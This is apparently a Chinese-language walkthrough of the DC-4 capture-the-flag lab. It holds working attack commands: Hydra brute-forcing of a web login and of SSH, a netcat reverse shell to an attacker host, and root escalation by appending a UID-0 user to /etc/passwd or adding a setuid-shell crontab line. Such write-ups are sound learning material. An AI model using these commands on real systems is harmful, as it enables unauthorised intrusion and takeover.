主机发现
在kali中使用netdiscover
,发现机器192.168.234.179
端口扫描
使用Nmap
,利用命令nmap -sV -A 192.168.234.179 --script=vuln
root@kali:~# nmap -sV -A 192.168.234.179 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-11 19:40 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.179
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx 1.15.10
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.179
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.234.179:80/
| Form id:
| Form action: login.php
|
| Path: http://192.168.234.179:80/login.php
| Form id:
|_ Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.15.10
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:B1:DD:47 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.234.179
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.88 seconds
从扫描的结果中我们看出,目标机器开放了80端口和22端口。
我们先访问80端口,查看一下Web服务。
网站页面上很干净,没有其他的东西,让我想起两方面:
1、暴力破解
2、目录扫描
使用dirsearch
脚本对其进行目录扫描,但是什么也没有发现。
$ python dirsearch.py -u http://192.168.234.179/ -e *
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: * | HTTP method: get | Threads: 10 | Wordlist size: 6104
Error Log: H:\工具\dirsearch-master\logs\errors-20-02-11_19-50-11.log
Target: http://192.168.234.179/
[19:50:11] Starting:
[19:50:11] 400 - 158B - /%2e%2e/google.com
[19:50:18] 302 - 704B - /command.php -> index.php
[19:50:18] 301 - 170B - /css -> http://192.168.234.179/css/
[19:50:21] 301 - 170B - /images -> http://192.168.234.179/images/
[19:50:21] 200 - 506B - /index.php
[19:50:21] 403 - 15B - /INDEX.PHP
[19:50:21] 403 - 15B - /index.PHP
[19:50:22] 302 - 206B - /login.php -> index.php
Task Completed
暴力破解
那么只剩下暴力破解了,根据页面内容,猜测账号为admin
。
使用工具Hydra
进行破解,这里我使用的是Hydra的图形版xHydra
此处的字典为/usr/share/wordlists/rockyou.txt
如果第一次使用该字典,需用使用
gunzip rockyou.txt.gz
,对密码字典压缩包进行解压。
此处为目标的url,冒号之后的内容为POST提交的固定格式。
/login.php:username=^USER^&password=^PASS^:S=logout
最后我们密码:
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 20:11:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.234.179:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.234.179 login: admin password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 20:11:55
<finished>
我们登录账号,admin:happy
命令执行
发现应该是有命令执行:
You are currently logged in
Run Command:
· List Files
Disk Usage
Disk Free
You have selected: ls -l
total 24
-rw-r--r-- 1 root root 1783 Apr 5 2019 command.php
drwxr-xr-x 2 root root 4096 Mar 24 2019 css
drwxr-xr-x 2 root root 4096 Mar 24 2019 images
-rw-r--r-- 1 root root 506 Apr 6 2019 index.php
-rw-r--r-- 1 root root 1473 Apr 7 2019 login.php
-rw-r--r-- 1 root root 663 Mar 24 2019 logout.php
这里确实可以执行命令。
既然是Linux系统,想个办法:执行我们需要的命令,并反弹shell。(嘿嘿,burp!)
执行成功。
那就反弹shell!!!
反弹shell
先在kali上开启监听,nc -lvp 7777
在burp上使用命令,nc 192.168.234.151 7777 -e /bin/bash
利用命令python -c 'import pty;pty.spawn("/bin/bash")'
获取交互shell。
查看权限
www-data@dc-4:/usr/share/nginx/html$ whoami
whoami
www-data
来到/home
目录下:
www-data@dc-4:/home$ ls
ls
charles jim sam
www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls
ls
backups mbox test.sh
www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
这里应该是三个账户的信息,但是只有jim下有信息。再看一下backups
www-data@dc-4:/home/jim$ cd bac
cd backups/
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
……
……
应该是jim账户的密码,那就使用hydra
进行破解。
root@kali:~# hydra -l jim -P passwd.txt -t 50 192.168.234.179 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 21:24:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 50 tasks per 1 server, overall 50 tasks, 253 login tries (l:1/p:253), ~6 tries per task
[DATA] attacking ssh://192.168.234.179:22/
[22][ssh] host: 192.168.234.179 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 47 final worker threads did not complete until end.
[ERROR] 47 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 21:24:42
得到密码为:jibril04
SSH登录
ssh -p 22 jim@192.168.234.179
查看mbox
jim@dc-4:/$ cd /home/jim
jim@dc-4:~$ ls
backups mbox test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
是一封来自root的邮件。
Linux中邮件存放在 /var/mail 中
jim@dc-4:~$ cd /var
jim@dc-4:/var$ ls
backups cache lib local lock log mail opt run spool tmp www
jim@dc-4:/var$ cd mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
我们得到了Charles的用户密码,便切换用户。
jim@dc-4:/var/mail$ su charles
Password:
charles@dc-4:/var/mail$
使用命令sudo -l
查看权限
发现可以在没有root密码的情况下,执行teehee
不清楚这个teehee如何去用。便百度了。
于是,从大佬那里得到两种提权方式。
提权
第一种提权
修改passwd
文件,写一个具有root权限的用户进去。
echo "hackergu::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释:
#如:admin:x:0:0::/home/admin:/bin/bash #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
现在我们就提权成功了。
root@dc-4:/# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
第二种提权
通过定时脚本进行脚本提权
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
时间全部写*,代表一分钟执行一次。
将/bin/sh的权限修改为4777,可以在非root用户下执行它,并且执行期间拥有root权限。
charles@dc-4:/$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:/$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash
charles@dc-4:/$ /bin/sh
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
#
参考文章:
https://blog.csdn.net/leesir98/article/details/101620077
https://www.jianshu.com/p/ac10a4149eef